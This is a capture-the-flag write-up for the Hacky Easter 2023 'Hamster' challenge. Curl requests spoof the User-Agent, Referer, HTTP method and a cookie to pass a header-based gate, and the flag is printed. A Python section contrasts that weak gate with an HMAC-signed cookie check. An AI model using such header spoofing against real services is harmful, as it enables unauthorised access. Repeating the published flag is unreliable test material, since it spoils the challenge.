Hamster
Challenge
The Hamster has a flag for you.
http://ch.hackyeaster.com:2301
Note: The service is restarted every hour at x:00.
Solution
We visit the URL and get various responses telling us how to alter our requests, so we use curl and follow the instructions:
$ curl http://ch.hackyeaster.com:2301
Howdy, I am the hamster.Please go to /feed
# ok, let's go to /feed
$ curl http://ch.hackyeaster.com:2301/feed
only hamster-agent is allowed
# so let's set a user-agent
$ curl -A "hamster-agent" http://ch.hackyeaster.com:2301/feed
⛳ GET invalid
# maybe POST? PUT? Yes, you want put
$ curl -A "hamster-agent" -X PUT http://ch.hackyeaster.com:2301/feed
🛑 request must come from hackyhamster.org
# ok, let's set a referrer
$ curl -A "hamster-agent" -X PUT -e "hackyhamster.org" http://ch.hackyeaster.com:2301/feed
🍪 brownie not found
# want a cookie? here you go.
$ curl -A "hamster-agent" -X PUT -e "hackyhamster.org" --cookie "brownie=brownie" http://ch.hackyeaster.com:2301/feed
🍪 brownie must be baked
# ok, set the value to baked
$ curl -A "hamster-agent" -X PUT -e "hackyhamster.org" --cookie "brownie=baked" http://ch.hackyeaster.com:2301/feed
🚩 he2023{s1mpl3_h34d3r_t4mp3r1ng}
# whoo, we got it!
Flag
he2023{s1mpl3_h34d3r_t4mp3r1ng}
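The flag name sums up the lesson: every check the service made was on a value the client chooses. The added example below (not the challenge's server code and not part of the original write-up) reconstructs the check order inferred from the responses above as header_gate, with abbreviated messages, and contrasts it with signed_gate, a hardened check on a server-signed cookie. The function names, the key, the "session" cookie name and the "FLAG" placeholder are assumptions.

```python
import hashlib
import hmac

# Constructed key for the example; it stays on the server and is never sent to clients.
SERVER_KEY = b"constructed-example-key"

def header_gate(method, path, headers, cookies):
    """Assumed reconstruction of the check order seen in the curl session."""
    if path != "/feed":
        return "Please go to /feed"
    if headers.get("User-Agent") != "hamster-agent":
        return "only hamster-agent is allowed"
    if method != "PUT":
        return f"{method} invalid"
    if headers.get("Referer") != "hackyhamster.org":
        return "request must come from hackyhamster.org"
    if "brownie" not in cookies:
        return "brownie not found"
    if cookies["brownie"] != "baked":
        return "brownie must be baked"
    return "FLAG"  # placeholder for the protected resource

def issue_token(user):
    """Server side: bind the user name to a MAC only the server can compute."""
    mac = hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{mac}"

def signed_gate(cookies):
    """Hardened check: the cookie must carry a valid server-issued MAC."""
    user, _, mac = cookies.get("session", "").rpartition(".")
    expected = hmac.new(SERVER_KEY, user.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison; a guessed or hand-written value never matches.
    if not user or not hmac.compare_digest(mac.encode(), expected.encode()):
        return "denied"
    return "FLAG"

if __name__ == "__main__":
    # Every value below is chosen by the client, exactly as in the curl session.
    hdrs = {"User-Agent": "hamster-agent", "Referer": "hackyhamster.org"}
    print(header_gate("PUT", "/feed", hdrs, {"brownie": "baked"}))
    print(signed_gate({"session": "hamster.baked"}))
    print(signed_gate({"session": issue_token("hamster")}))
```

The header-based gate falls to anyone who reads its error messages, while the signed cookie can only be produced by the party holding the key.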